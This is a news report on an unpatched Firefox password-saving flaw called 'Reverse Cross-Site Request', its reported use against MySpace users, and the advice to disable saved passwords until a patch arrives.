Security experts Wednesday warned that Mozilla Corp.'s Firefox browser has an unpatched flaw that lets criminals pilfer Web site or account passwords, and said that the tactic has already been used on MySpace to steal log-in information from users of the popular social networking service.

Dubbed the "Reverse Cross-Site Request" vulnerability by its discoverer, the vulnerability is in Firefox's password-saving feature. Attackers can exploit the flaw by crafting malicious HTML code that hijacks a username and password from a legitimate site, such as a blog or message forum, then transports the log-in to another site. Users would not notice that the theft had even taken place, said Robert Chapin, who reported the bug to Mozilla earlier this month.

Microsoft's Internet Explorer is also vulnerable to RCSR attack, added Chapin, although circumstances make it less likely that attackers will exploit the bug in IE.

Danish vulnerability tracker Secunia rated the threat as "Less critical," the second out of five possible rankings.

Chapin cited an October fraud on MySpace as the first evidence of an RCSR-based attack. "A recent large-scale attack using RCSR targeted MySpace.com users involved fake log-in forms on the MySpace site inviting users to type in their username and password," he wrote in a warning.

Current versions of Firefox, including 1.5.0.8 and 2.0, are vulnerable to RCSR attack; until a patch is available, users can deflect such attacks by disabling the automated password saving feature. In Firefox, users should select Tools|Options|Security, then clear the box marked "Remember passwords for sites."